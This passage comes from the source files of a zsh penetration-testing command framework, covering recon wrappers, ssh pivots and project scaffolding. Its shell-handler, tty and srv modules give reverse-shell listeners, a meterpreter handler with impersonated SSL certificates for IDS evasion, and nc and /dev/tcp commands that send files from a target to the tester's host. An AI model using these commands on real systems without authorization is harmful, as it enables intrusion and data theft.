qq-vars-set-rport\n qq-vars-set-lport\n print -z \"ssh -R ${__LPORT}:127.0.0.1:${__RPORT} ${__USER}@${__RHOST}\" \n}\n\nqq-pivot-ssh-remote-to-local-burp() {\n __check-user\n qq-vars-set-rhost\n print -z \"ssh -R 8080:127.0.0.1:8080 ${__USER}@${__RHOST}\"\n}\n\n" }, { "path": "modules/qq-project-custom.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-project-custom\n#############################################################\n\nqq-project-custom-help() {\n cat << \"DOC\"\n\nqq-project-custom\n-----------------\nThe qq-project-custom namespace provides commands to setup custom project\ndirectory structures and variables for users that have specific requirements.\n\nVariables\n---------\n__PROJECT_ZD_CONSULTANT: a global variable for consultant name used in ZD projects\n__PROJECT_ZD_ROOT: a global variable for the project root folder used in ZD projects\n\nCommands\n--------\nqq-project-custom-zd-start: scaffolds directory structure and logbook for \"zd\" projects\nqq-project-custom-zd-end: zips and removes directories and data for \"zd\" projects\nqq-project-custom-zd-root-set: sets the __PROJECT_ZD_ROOT variable\nqq-project-custom-zd-consultant-set: sets the __PROJECT_ZD_CONSULTANT variable\n\nDOC\n}\n\nexport __PROJECT_ZD=\"\"\nexport __PROJECT_ZD_CONSULTANT=\"$(cat ${__GLOBALS}/__PROJECT_ZD_CONSULTANT 2> /dev/null)\"\nexport __PROJECT_ZD_ROOT=\"$(cat ${__GLOBALS}/__PROJECT_ZD_ROOT 2> /dev/null)\"\n\n__check-project-zd() {\n if [[ -z $__PROJECT_ZD_CONSULTANT ]]\n then\n qq-project-custom-zd-root-set\n fi\n if [[ -z $__PROJECT_ZD_ROOT ]]\n then\n qq-project-custom-zd-consultant-set\n fi\n}\n\nqq-project-custom-zd-root-set() {\n __warn \"Enter the full path to the root folder of your projects.\"\n __prefill __PROJECT_ZD_ROOT DIR $HOME\n echo \"${__PROJECT_ZD_ROOT}\" > ${__GLOBALS}/PROJECT_ZD_ROOT\n}\n\nqq-project-custom-zd-consultant-set() {\n __warn \"Enter consultant name below.\"\n __askvar __PROJECT_ZD_CONSULTANT NAME \n echo \"${__PROJECT_ZD_CONSULTANT}\" > ${__GLOBALS}/PROJECT_ZD_CONSULTANT\n}\n\nqq-project-custom-zd-start() {\n\n __check-project-zd\n\n local pid && __askvar pid \"PROJECT ID\"\n local pname && __askvar pname \"PROJECT NAME\"\n\n local fname=\"${pid}-${pname}-${__CONSULTANT_NAME// /}\"\n local fullpath=${__PROJECT_ROOT}/${fname}\n\n #scaffold\n mkdir -p ${fullpath}/{burp/{log,intruder,http-requests},client-supplied-info/emails,files/{downloads,uploads},notes/screenshots,scans/{raw,pretty},ssl,tool-output}\n \n #set project to be tool-output\n __PROJECT=${fullpath}/tool-output\n\n # wanted this to be an optional step, sometimes I'll create folders in advance due to calls with clients ahead of the test or prep work\n local setlog && read \"setlog?$fg[cyan]Add a log file for this project (y/n)?:$reset_color \"\n case \"$setlog\" in \n y|Y ) \n qq-log-set\n ;;\n n|N ) \n echo \"no\"\n ;;\n * ) \n echo \"\"\n ;;\n esac \n}\n\nqq-project-custom-zd-end() {\n\n __check-project-zd\n\n __ask \"Select a project folder: \"\n local pd=$(__menu $(find $__PROJECT_ROOT -mindepth 1 -maxdepth 1 -type d))\n __ok \"Selected: ${pd}\"\n\n\n # Task 1: delete all empty folders\n local df && read \"df?$fg[cyan]Delete empty folders? (Y/n)?:$reset_color \"\n if [[ \"$df\" =~ ^[Yy]$ ]]\n then\n find ${pd} -type d -empty -delete \n __ok \"Empty folders deleted.\"\n fi\n\n # Task 2: create tree\n cd ${pd}\n tree -C -F -H ./ > ${pd}/tree.html \n [[ -f \"${pd}/tree.html\" ]] && __ok \"Created ${pd}/tree.html.\" || __err \"Failed creating ${pd}/tree.html\"\n cd - > /dev/null 2>&1\n\n # Task 3: zip up engagement folder\n local zf=$(basename ${pd})\n 7z a -t7z -m0=lzma2 -mx=9 -mfb=64 -md=1024m -ms=on ${__PROJECT_ROOT}/${zf}.7z ${pd} > /dev/null 2>&1\n [[ -f ${__PROJECT_ROOT}/${zf}.7z ]] && __ok \"Zipped files into ${__PROJECT_ROOT}/${zf}.7z.\" || __err \"Failed to zip ${pd}\"\n\n # Task 4: Delete engagement folder\n local rmp && read \"rmp?$fg[cyan]Delete project folder? (Y/n)?:$reset_color \"\n if [[ \"${rmp}\" =~ ^[Yy]$ ]] && print -z \"rm -rf ${pd}\"\n\n __ok \"Project ended.\"\n}" }, { "path": "modules/qq-project.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-project\n#############################################################\n\nqq-project-help() {\n cat << \"DOC\"\n\nqq-project\n----------\nThe project namespace provides commands that help with setting\nup scope for an engagement or bug bounty, as well as commands for\nsyncing data and managing a VPS.\n\nCommands\n--------\nqq-project-install: installs dependencies\nqq-project-scope: generate a scope regex by root word (matches all to the left and right)\nqq-project-rescope-txt: uses rescope to generate scope from a url\nqq-project-rescope-burp: uses rescope to generate burp scope (JSON) from a url\nqq-project-sync-remote-to-local: sync data from a remote server directory to a local directory using SSHFS\nqq-project-sync-local-file-to-remote: sync a local file to a remote server using rsync over SSH\nqq-project-google-domain-dyn: update IP address using Google domains hosted dynamic record\n\nDOC\n}\n\nqq-project-install() {\n __info \"Running $0...\"\n __pkgs fusermount sshfs rsync curl\n qq-install-golang\n go get -u github.com/root4loot/rescope\n}\n\nqq-project-scope() {\n __check-project\n __check-org\n print -z \"echo \\\"^.*?${__ORG}\\..*\\$ \\\" >> ${__PROJECT}/scope.txt\"\n}\n\nqq-project-rescope-burp() {\n __check-project\n __ask \"Enter the URL to the bug bounty scope description\"\n qq-vars-set-url\n mkdir -p ${__PROJECT}/burp\n print -z \"rescope --burp -u ${__URL} -o ${__PROJECT}/burp/scope.json\"\n}\n\nqq-project-sync-remote-to-local() {\n __warn \"Enter your SSH connection username@remote_host\"\n local ssh && __askvar ssh SSH\n __warn \"Enter the full remote path to the directory your want to copy from\"\n local rdir && __askvar rdir \"REMOTE DIR\"\n __warn \"Enter the full local path to the directory to use as a mount point\"\n local mnt && __askpath mnt \"LOCAL MOUNT\" /mnt\n __warn \"Enter the full local path to the directory to sync the data to\"\n local ldir && __askpath lidr \"LOCAL DIR\" $HOME\n\n sudo mkdir -p $mnt\n\n __ok \"Mounting $rdir to $mnt ...\"\n sudo sshfs ${ssh}:${rdir} ${mnt}\n\n __ok \"Syncing data from $mnt to $ldir ...\"\n sudo rsync -avuc ${mnt} ${ldir}\n\n __ok \"Unmounting $mnt. ...\"\n sudo fusermount -u ${mnt}\n\n __ok \"Sync Completed\"\n}\n\nqq-project-sync-local-file-to-remote() {\n __warn \"Enter your SSH connection username@remote_host\"\n local ssh && __askvar ssh SSH\n __warn \"Enter the full local path to the file you want to copy to your remote server\"\n local lfile && __askpath lfile \"LOCAL FILE\" $HOME\n __warn \"Enter the full remote path to the directory your want to copy the file to\"\n local rdir && __askvar rdir \"REMOTE DIR\"\n print -z \"rsync -avz -e \\\"ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\\\" --progress $lfile $ssh:$rdir\"\n}\n\nqq-project-google-domain-dyn() {\n local u && __askvar u USERNAME\n local p && __askvar p PASSWORD\n local d && __askvar d DOMAIN\n qq-vars-set-lhost \n print -z \"curl -s -a \\\"${__UA}\\\" https://$u:$p@domains.google.com/nic/update?hostname=${d}&myip=${__LHOST} \"\n}\n" }, { "path": "modules/qq-recon-domains.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-recon-domains\n#############################################################\n\nqq-recon-domains-help() {\n cat << \"DOC\"\n\nqq-recon-domains\n-------------\nThe recon-domains namespace provides commands to recon horizontal domains of a root domain.\nAll domains stored in $__PROJECT/domains/domains.txt and $__PROJECT/amass.\nYou can sort unique this file in place with the \"sfu\" alias.\n\nCommands\n--------\nqq-recon-domains-install: installs dependencies\nqq-recon-domains-amass-whois: find domains with whois\nqq-recon-domains-amass-asn: find domains by asn\n\nDOC\n}\n\nqq-recon-domains-install() {\n __info \"Running $0...\"\n __pkgs amass \n}\n\nqq-recon-domains-amass-whois() {\n __check-project\n qq-vars-set-domain\n mkdir -p ${__PROJECT}/amass\n mkdir -p ${__PROJECT}/domains\n print -z \"amass intel -active -whois -d ${__DOMAIN} -dir ${__PROJECT}/amass | tee -a ${__PROJECT}/domains/domains.txt\"\n}\n\nqq-recon-domains-amass-asn() {\n __check-project\n __check-asn\n mkdir -p ${__PROJECT}/amass\n mkdir -p ${__PROJECT}/domains\n print -z \"amass intel -active -asn ${__ASN} -dir ${__PROJECT}/amass | tee -a ${__PROJECT}/domains/domains.txt\"\n}\n" }, { "path": "modules/qq-recon-github.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-recon-github\n#############################################################\n\nqq-recon-github-help() {\n cat << \"DOC\"\n\nqq-recon-github\n------------\nThe recon-github namespace provides commands for the recon of github repos.\nAll output will be stored under $__PROJECT/source\n\nCommands\n--------\nqq-recon-github-install: installs dependencies\nqq-recon-github-user-repos: uses curl to get a list of repos for a github user\nqq-recon-github-endpoints: gets a list of urls from all repos of a domain on github\nqq-recon-github-gitrob: clones (in mem) repos and searches for github dorks\nqq-recon-github-api-set: set github API key global variable\n\nDOC\n}\n\nqq-recon-github-install() {\n __info \"Running $0...\"\n __pkgs curl jq python3 \n qq-install-golang\n qq-install-github-search\n qq-install-git-secrets\n qq-install-gitrob\n}\n\nqq-recon-github-user-repos() {\n __check-project\n __check-user\n mkdir -p ${__PROJECT}/source\n print -z \"curl -s \\\"https://api.github.com/users/${__USER}/repos?per_page=1000\\\" | jq '.[].git_url' | tee -a ${__PROJECT}/source/${__USER}.txt \"\n}\n\nqq-recon-github-endpoints() {\n __check-api-github\n __check-project\n qq-vars-set-domain\n mkdir -p ${__PROJECT}/source\n print -z \"github-endpoints.py -t ${__API_GITHUB} -d ${__DOMAIN} | tee -a ${__PROJECT}/source/${__DOMAIN}.endpoints.txt \"\n}\n\nqq-recon-github-gitrob() {\n __check-api-github\n __check-project\n __check-user\n local d=${__PROJECT}/source/${__USER}\n mkdir -p $d\n cp $HOME/go/src/github.com/codeEmitter/gitrob/filesignatures.json $d\n __info \"Gitrob UI: http://127.0.0.1:9393/\"\n print -z \"pushd $d ;gitrob -in-mem-clone -save \\\"$d/output.json\\\" -github-access-token $__API_GITHUB ${__USER} && popd\"\n}\n" }, { "path": "modules/qq-recon-networks.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-recon-networks\n#############################################################\n\nqq-recon-networks-help() {\n cat << \"DOC\"\n\nqq-recon-networks\n-------------\nThe recon-networks namespace provides commands to recon ASNs and IP networks for an organization.\nAll network data is stored in $__PROJECT/networks.\n\nCommands\n--------\nqq-recon-networks-install: installs dependencies\nqq-recon-networks-amass-asn: find asns by domain\nqq-recon-networks-bgp: use the bgp.he.net website to find asns and networks\nqq-recon-networks-bgpview-ipv4: curl api.bgpview.io for ipv4 networks by asn\nqq-recon-networks-bgpview-ipv6: curl api.bgpview.io for ipv6 networks by asn\n\nDOC\n}\n\nqq-recon-networks-install() {\n __info \"Running $0...\"\n __pkgs curl jq amass\n}\n\nqq-recon-networks-bgp() {\n __info \"Search https://bgp.he.net/\"\n}\n\nqq-recon-networks-amass-asns() {\n __check-project\n __check-org\n mkdir ${__PROJECT}/networks\n print -z \"amass intel -org ${__ORG} | cut -d, -f1 | tee -a ${__PROJECT}/networks/asns.txt \"\n}\n\nqq-recon-networks-bgpview-ipv4() {\n __check-project\n __check-asn\n mkdir ${__PROJECT}/networks\n print -z \"curl -s https://api.bgpview.io/asn/${__ASN}/prefixes | jq -r '.data | .ipv4_prefixes | .[].prefix' | tee -a ${__PROJECT}/networks/ipv4.txt\"\n}\n\nqq-recon-networks-bgpview-ipv6() {\n __check-project\n __check-asn\n mkdir ${__PROJECT}/networks\n print -z \"curl -s https://api.bgpview.io/asn/${__ASN}/prefixes | jq -r '.data | .ipv6_prefixes | .[].prefix' | tee -a ${__PROJECT}/networks/ipv6.txt\"\n}\n\n" }, { "path": "modules/qq-recon-org.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-recon-org\n#############################################################\n\nqq-recon-org-help() {\n cat << \"DOC\"\n\nqq-recon-org\n------------\nThe recon namespace provides commands for the recon of an organization.\nData from commands will be stored in $__PROJECT/recon.\n\nCommands\n--------\nqq-recon-org-install: installs dependencies\nqq-recon-org-files-metagoofil: uses metagoofil to search and download files for a domain\nqq-recon-org-wordlist-cewl: uses cewl to create a custom wordlist from a url\nqq-recon-org-theharvester: uses theHarvester to mine data about a target domain\n\nDOC\n}\n\nqq-recon-org-install() {\n __info \"Running $0...\"\n __pkgs whois metagoofil cewl theharvester\n}\n\nqq-recon-org-files-metagoofil() {\n __check-project\n __check-ext-docs\n qq-vars-set-domain\n mkdir -p ${__PROJECT}/recon/files\n print -z \"metagoofil -u \\\"${__UA}\\\" -d ${__DOMAIN} -t ${__EXT_DOCS} -o ${__PROJECT}/recon/files\"\n}\n\nqq-recon-org-files-urls() {\n __check-project\n qq-vars-set-domain\n print -z \"strings * | gf urls | grep $__DOMAIN | tee -a ${__PROJECT}/recon/urls.txt\"\n}\n\nqq-recon-org-wordlist-by-url-cewl() {\n __check-project\n qq-vars-set-url\n mkdir -p ${__PROJECT}/recon\n print -z \"cewl -a -d 3 -m 5 -u \\\"${__UA}\\\" -w ${__PROJECT}/recon/cewl.txt ${__URL}\"\n}\n\nqq-recon-org-theharvester() {\n __check-project\n qq-vars-set-domain\n mkdir -p ${__PROJECT}/recon\n print -z \"theHarvester -d ${__DOMAIN} -l 50 -b all -f ${__PROJECT}/recon/harvested.txt\"\n}\n\nqq-recon-org-cse() {\n __info \"Use https://cse.google.com/cse/all to create a custom search engine\"\n}" }, { "path": "modules/qq-recon-subs.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-recon-subs\n#############################################################\n\nqq-recon-subs-help() {\n cat << \"DOC\"\n\nqq-recon-subs\n-------------\nThe recon namespace provides commands to recon vertical sub-domains of a root domain.\nAll subdomains for a domain will be stored in $__PROJECT/amass and $__PROJECT/domains/$DOMAIN/subs.txt.\nYou can sort unique this file in place with the \"sfu\" alias.\n\nCommands\n--------\nqq-recon-subs-install: installs dependencies\n\nCommands - enumeration\n----------------------\nqq-recon-subs-amass-enum: enumerate subdomains into amass db (api keys help)\nqq-recon-subs-amass-diff: track changes between last 2 enumerations using amass db\nqq-recon-subs-amass-names: list gathered subs in the amass db\nqq-recon-subs-crt.sh: gather subdomains from crt.sh\nqq-recon-subs-subfinder: gather subdomains from sources (api keys help)\nqq-recon-subs-assetfinder: gather subdomains from sources (api keys help)\nqq-recon-subs-wayback: gather subdomains from Wayback Machine\n\nCommands - brute force\n----------------------\nqq-recon-subs-brute-massdns: try to resolve a list of subdomains generated for brute forcing\nqq-recon-subs-gen-wordlist: generate a wordlist of possible sub domains \n\nCommands - processing\n---------------------\nqq-recon-subs-resolve-massdns: resolve a file of subdomains using massdns\nqq-recon-subs-resolve-parse: parse resolved.txt into A, CNAME and IP's\n\nDOC\n}\n\nqq-recon-subs-install() {\n __info \"Running $0...\"\n __pkgs gobuster amass curl wordlists seclists dnsrecon dnsutils\n\n qq-install-golang\n go get -u github.com/projectdiscovery/subfinder/cmd/subfinder\n go get -u github.com/tomnomnom/assetfinder\n go get -u github.com/tomnomnom/waybackurls\n\n qq-install-massdns\n}\n\nqq-recon-subs-amass-enum() {\n __check-project\n qq-vars-set-domain\n mkdir -p ${__PROJECT}/amass\n print -z \"amass enum -active -ip -d ${__DOMAIN} -dir ${__PROJECT}/amass\"\n}\n\nqq-recon-subs-amass-diff() {\n __check-project\n qq-vars-set-domain\n mkdir -p ${__PROJECT}/amass\n print -z \"amass track -d ${__DOMAIN} -last 2 -dir ${__PROJECT}/amass\"\n}\n\nqq-recon-subs-amass-names() {\n __check-project\n qq-vars-set-domain\n mkdir -p ${__PROJECT}/amass\n print -z \"amass db -names -d ${__DOMAIN} -dir ${__PROJECT}/amass | tee -a $(__dompath)/subs.txt\"\n}\n\nqq-recon-subs-crt.sh() {\n __check-project\n qq-vars-set-domain\n print -z \"curl -s 'https://crt.sh/?q=%.${__DOMAIN}' | grep -i \\\"${__DOMAIN}\\\" | cut -d '>' -f2 | cut -d '<' -f1 | grep -v \\\" \\\" | sort -u | tee -a $(__dompath)/subs.txt \"\n}\n\nqq-recon-subs-subfinder() {\n __check-project\n qq-vars-set-domain\n __check-threads\n print -z \"subfinder -t ${__THREADS} -d ${__DOMAIN} -nW -silent | tee -a $(__dompath)/subs.txt\"\n}\n\nqq-recon-subs-assetfinder() {\n __check-project\n qq-vars-set-domain\n print -z \"echo ${__DOMAIN} | assetfinder --subs-only | tee -a $(__dompath)/subs.txt\" \n}\n\nqq-recon-subs-wayback() {\n __check-project\n qq-vars-set-domain \n print -z \"echo ${__DOMAIN} | waybackurls | cut -d \"/\" -f3 | sort -u | grep -v \\\":80\\\" | tee -a $(__dompath)/subs.txt\"\n}\n\nqq-recon-subs-resolve-massdns() {\n __check-project\n __check-resolvers\n qq-vars-set-domain\n print -z \"massdns -r ${__RESOLVERS} -s 100 -c 3 -t A -o S -w $(__dompath)/resolved.txt $(__dompath)/subs.txt\"\n}\n\nqq-recon-subs-brute-massdns() {\n __check-project\n __check-resolvers\n qq-vars-set-domain\n __ask \"Select the file containing a custom wordlist for ${__DOMAIN} (qq-recon-subs-gen-wordlist)\"\n local f && __askpath f FILE $(__dompath)\n print -z \"massdns -r ${__RESOLVERS} -s 100 -c 3 -t A -o S -w $(__dompath)/resolved-brute.txt $f\"\n}\n\nqq-recon-subs-resolve-parse() {\n __check-project\n qq-vars-set-domain\n __info \"Generating files resolved-*.txt\"\n grep -ie \"CNAME\" $(__dompath)/resolved.txt | sort -u > $(__dompath)/resolved-CNAME.txt\n grep -v \"CNAME\" $(__dompath)/resolved.txt | sort -u > $(__dompath)/resolved-A.txt\n grep -v \"CNAME\" $(__dompath)/resolved.txt | sort -u | cut -d' ' -f3 | sort -u > $(__dompath)/resolved-IP.txt\n}\n\nqq-recon-subs-gen-wordlist() {\n __check-project\n qq-vars-set-domain\n local f && __askpath f FILE /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt\n print -z \"for s in \\$(cat ${f}); do echo \\$s.${__DOMAIN} >> $(__dompath)/subs.wordlist.txt; done\"\n}\n" }, { "path": "modules/qq-scripts.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-scripts\n#############################################################\n\n# qq-scripts-help() {\n# cat << \"DOC\"\n\n# qq-scripts\n# -------\n# The scripts namespace runs scripts from the quiver\n# scripts directory.\n\n# ** IN DEVELOPMENT, NOT READY FOR USE **\n\n# Commands\n# --------\n# qq-scripts-recon: a zsh recon script\n# qq-scripts-webrecon: a zsh webrecon script\n\n# DOC\n# }\n\n# qq-scripts-recon() {\n# local d && read \"d?$(__cyan DOMAIN: )\"\n# local o && read \"o?$(__cyan ORG: )\"\n# local w && read \"out?$(__cyan WORKING\\(DIR\\): )\"\n# print -z \"zsh ${__SCRIPTS}/recon.zsh ${d} \\\"${o}\\\" \\\"${w}\\\"\"\n# }\n\n# qq-scripts-webrecon() {\n# local f=$(rlwrap -S \"$(__cyan FILE:\\(DOMAINS\\))\" -e '' -c -o cat)\n# local w && read \"out?$(__cyan WORKING\\(DIR\\): )\"\n# pushd ${w}\n# print -z \"zsh ${__SCRIPTS}/webrecon.zsh ${f}\"\n# popd\n# }\n\n\n" }, { "path": "modules/qq-shell-handlers-msf.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-shell-handlers-msf\n#############################################################\n\nqq-shell-handlers-msf-help() {\n cat << \"DOC\"\n\nqq-shell-handlers-msf\n---------------------\nThe shell-handlers-msf namespace provides commands for spawning \nreverse shell connections using metasploit.\n\nCommands\n--------\nqq-shell-handlers-msf-install: installs dependencies\nqq-shell-handlers-msf-ssl-gen: impersonate a real SSL certificate for use in reverse shells\nqq-shell-handlers-msf-w64-multi-https: multi-handler for staged windows/x64/meterpreter/reverse_https payload\n\nDOC\n}\n\nqq-shell-handlers-install-msf() {\n __info \"Running $0...\"\n __pkgs metasploit-framework\n}\n\nqq-shell-handlers-msf-ssl-gen() {\n __ask \"Enter the hostname of the site to impersonate\"\n local r && __prefill r SITE aka.ms\n local cmd=\"use auxiliary/gather/impersonate_ssl; set RHOST ${r}; run; exit \"\n __info \"Use qq-vars-global-set-ssl-shell-cert to the path of the .pem file\"\n print -z \"msfconsole -n -q -x \\\"${cmd}\\\" \"\n}\n\nqq-shell-handlers-msf-w64-https() {\n qq-vars-set-lhost\n qq-vars-set-lport\n __msf << VAR\nuse exploit/multi/handler;\nset PAYLOAD windows/x64/meterpreter/reverse_https;\nset LHOST ${__LHOST};\nset LPORT ${__LPORT};\nset HANDLERSSLCERT ${__SHELL_SSL_CERT};\nset EXITONSESSION false\nrun;\nexit\nVAR\n\n}\n" }, { "path": "modules/qq-shell-handlers.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-shell-handlers\n#############################################################\n\nqq-shell-handlers-help() {\n cat << \"DOC\"\n\nqq-shell-handlers\n-----------------\nThe shell-handlers namespace provides commands for spawning reverse shell\nconnections.\n\nCommands\n--------\nqq-shell-handlers-install: installs dependencies\nqq-shell-handlers-msf-ssl-gen: impersonate a real SSL certificate for use in reverse shells\nqq-shell-handlers-nc: \nqq-shell-handlers-ncrl: \nqq-shell-handlers-nc-udp:\nqq-shell-handlers-socat:\n\nDOC\n}\n\nqq-shell-handlers-install() {\n __info \"Running $0...\"\n __pkgs netcat socat\n}\n\n# netcat\n\nqq-shell-handlers-nc() {\n qq-vars-set-lport\n print -z \"nc -nlvp ${__LPORT}\"\n}\n\nqq-shell-handlers-ncrl() {\n qq-vars-set-lport\n print -z \"rlwrap nc -nlvp ${__LPORT}\"\n}\n\nqq-shell-handlers-nc-udp() {\n qq-vars-set-lport\n print -z \"nc -nlvu ${__LPORT}\"\n}\n\n# socat\n\nqq-shell-handlers-socat() {\n qq-vars-set-lport\n print -z \"socat file:`tty`,raw,echo=0 tcp-listen:${__LPORT}\"\n}\n" }, { "path": "modules/qq-shell-tty.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-shell-tty\n#############################################################\n\nqq-shell-tty-help() {\n cat << \"DOC\"\n\nqq-shell-tty\n------------\nThe shell-tty namespace provides commands for fixing interactive \ncommand/reverse shells.\n\nCommands\n--------\nqq-shell-tty-python2: command to spawn a tty shell\nqq-shell-tty-python3: command to spawn a tty shell \nqq-shell-tty-perl: command to spawn a tty shell\nqq-shell-tty-ruby: command to spawn a tty shell\nqq-shell-tty-lua: command to spawn a tty shell\nqq-shell-tty-expect: command to spawn a tty shell\n\nDOC\n}\n\nqq-shell-tty-python2() {\n __ok \"Copy the commands below and use on the remote system\"\n cat << \"DOC\" \n\npython -c 'import pty;pty.spawn(\"/bin/sh\")' \n\nDOC\n}\n\nqq-shell-tty-python3() {\n __ok \"Copy the commands below and use on the remote system\"\n cat << \"DOC\" \n\npython3 -c 'import pty;pty.spawn(\"/bin/sh\")'\n\nDOC\n}\n\nqq-shell-tty-perl() {\n __ok \"Copy the commands below and use on the remote system\"\n cat << \"DOC\" \n\nperl -e 'exec \"/bin/sh\";'\n\nDOC\n}\n\nqq-shell-tty-ruby() {\n __ok \"Copy the commands below and use on the remote system\"\n cat << \"DOC\" \n\nruby: exec \"/bin/sh\"\n\nDOC\n}\n\nqq-shell-tty-lua() {\n __ok \"Copy the commands below and use on the remote system\"\n cat << \"DOC\" \n\nlua: os.execute('/bin/sh')\n\nDOC\n}\n\nqq-shell-tty-expect() {\n __ok \"Copy the commands below and use on the remote system\"\n cat << \"DOC\" \n\n/usr/bin/expect sh\n\nDOC\n}\n" }, { "path": "modules/qq-srv.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-srv\n#############################################################\n\nqq-srv-help() {\n cat << \"DOC\"\n\nqq-srv\n-------\nThe srv namespace provides commands for hosting local services\nsuch as web, ftp, smb and other services for data exfil or transfer.\n\nCommands\n--------\nqq-srv-install: install dependencies\nqq-srv-web: hosts a python3 web server in current dir\nqq-srv-ftp: hosts a python3 ftp server in current dir\nqq-srv-smb: hosts an impacket smb server in current dir\nqq-srv-tftp: starts the atftpd service in /srv/tftp\nqq-srv-smtp: hosts a python3 smtp server in current dir\nqq-srv-updog: hosts an updog web server in current dir\nqq-srv-nc-tar: hosts a netcat server > tar file in current dir\nqq-srv-nc-file: hosts a netcat server > file in current dir\nqq-srv-web-hosted: hosts a python3 web server in /srv, port as $1\nqq-srv-php-hosted: hosts a php web server in /srv, port as $1\nqq-srv-ftp-hosted: hosts a python3 ftp server in /srv\nqq-srv-updog-hosted: hosts an updog web server in /srv\n\nDOC\n}\n\nqq-srv-install() {\n __info \"Running $0...\"\n __pkgs netcat atftpd \n __pkgs php python3 python3-pip python3-smb python3-pyftpdlib impacket-scripts\n sudo pip3 install updog\n}\n\nqq-srv-web() print -z \"sudo python3 -m http.server 80\"\nqq-srv-ftp() print -z \"sudo python3 -m pyftpdlib -p 21 -w\"\nqq-srv-smb() print -z \"sudo impacket-smbserver -smb2supp F .\"\nqq-srv-tftp() print -z \"sudo service atftpd start\"\nqq-srv-smtp() print -z \"sudo python3 -m smtpd -c DebuggingServer -n 0.0.0.0:25\"\n\nqq-srv-web-hosted() {\n __info \"Serving content from /srv\"\n if [ \"$#\" -eq \"1\" ]\n then\n pushd /srv &> /dev/null\n sudo python3 -m http.server $1\n popd &> /dev/null\n else\n pushd /srv &> /dev/null\n sudo python3 -m http.server 80\n popd &> /dev/null\n fi\n}\n\nqq-srv-php-hosted() {\n __info \"Serving content from /srv\"\n if [ \"$#\" -eq \"1\" ]\n then\n pushd /srv &> /dev/null\n sudo php -S 0.0.0.0:$1 \n popd &> /dev/null\n else\n pushd /srv &> /dev/null\n sudo php -S 0.0.0.0:80\n popd &> /dev/null\n fi\n}\n\nqq-srv-ftp-hosted() {\n __info \"Serving content from /srv\"\n pushd /srv &> /dev/null\n sudo python3 -m pyftpdlib -p 21 -w\n popd &> /dev/null\n}\n\nqq-srv-updog() {\n print -z \"updog -p 443 --ssl -p $(__rand 10)\"\n}\n\nqq-srv-updog-hosted() {\n __info \"Serving content from /srv\"\n sudo updog -p 443 --ssl -d /srv\n}\n\nqq-srv-nc-tar() {\n qq-vars-set-lhost\n qq-vars-set-lport\n __cyan \"Use the command below on the target system: \"\n echo \"tar cfv - /path/to/send | nc ${__LHOST} ${__LPORT}\"\n print -z \"nc -nvlp ${__LPORT} | tar xfv -\"\n}\n\nqq-srv-nc-file() {\n qq-vars-set-lhost\n qq-vars-set-lport\n __cyan \"Use the command below on the target system: \"\n echo \"cat FILE > /dev/tcp/${__LHOST}/${__LPORT}\"\n print -z \"nc -nvlp ${port} -w 5 > incoming.txt\" \n}\n\nqq-srv-nc-b64() {\n qq-vars-set-lhost\n qq-vars-set-lport\n __cyan \"Use the command below on the target system: \"\n echo \"openssl base64 -in FILE > /dev/tcp/${__LHOST}/${__LPORT}\"\n print -z \"nc -nvlp ${__LPORT} -w 5 > incoming.b64 && openssl base64 -d -in incoming.b64 -out incoming.txt\" \n}\n" }, { "path": "modules/qq-vars-global.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-vars-global\n#############################################################\n\nqq-vars-global-help() {\n cat << \"DOC\"\n\nqq-vars-global\n--------------\nThe vars global namespace manages environment variables used in other functions\nthat are saved between sessions. Values are stored as files the .quiver/globals\ndirectory and can contain sensitive information like API keys. These variables\nare used to supply arguments to commands in other modules.\n\nVariables\n---------\n__IMPACKET: full path to the python3 impacket examples directory\n__EXT_PHP: a list of file extensions used on PHP webservers\n__EXT_DOCS: a list of common documents file types\n__API_GITHUB: your personal Github API key\n__RESOLVERS: path to public resolvers file \n__NOTES: path to the directory containing your markdown notes for qq-notes\n__MNU_UA: path to the file containing user-agent strings\n__MNU_WORDLISTS: path to the file containing a list of favorite wordlists\n__TCP_PORTS: path to the file of favorite TCP ports\n__SHELL_SSL_CERT: path to the file of an impersonated SSL cert used for reverse shell IDS evasion\n__ALIASES: path to the file containing aliases that will be sourced\n\nCommands\n--------\nqq-vars-global: list all current global variable values\nqq-vars-global-set-*: used to set and save each individual variable\n\nDOC\n}\n\nqq-vars-global() {\n echo \"$(__cyan IMPACKET: ) ${__IMPACKET}\"\n echo \"$(__cyan EXT_PHP: ) ${__EXT_PHP}\"\n echo \"$(__cyan EXT_DOCS: ) ${__EXT_DOCS}\"\n echo \"$(__cyan API_GITHUB: ) ${__API_GITHUB}\"\n echo \"$(__cyan NOTES: ) ${__NOTES}\"\n echo \"$(__cyan RESOLVERS: ) ${__RESOLVERS}\"\n echo \"$(__cyan MNU_UA: ) ${__MNU_UA}\"\n echo \"$(__cyan MNU_WORDLISTS: ) ${__MNU_WORDLISTS}\"\n echo \"$(__cyan TCP_PORTS: ) ${__TCP_PORTS}\"\n echo \"$(__cyan SHELL_SSL_CERT: ) ${__SHELL_SSL_CERT}\"\n echo \"$(__cyan ALIASES: ) ${__ALIASES}\"\n}\n\n########## __IMPACKET\n\nexport __IMPACKET=$(cat ${__GLOBALS}/IMPACKET 2> /dev/null || echo \"/usr/share/doc/python3-impacket/examples/\")\n\nqq-vars-global-set-impacket() {\n __ask \"Set the full path to the python3-impacket/examples directory.\"\n __askpath __IMPACKET DIR /\n echo \"${__IMPACKET}\" > ${__GLOBALS}/IMPACKET\n}\n\n__check-impacket() { [[ -z \"${__PROJECT}\" ]] && qq-vars-global-set-impacket }\n\n########## __EXT_PHP\n\nexport __EXT_PHP=$(cat ${__GLOBALS}/EXT_PHP 2> /dev/null || echo 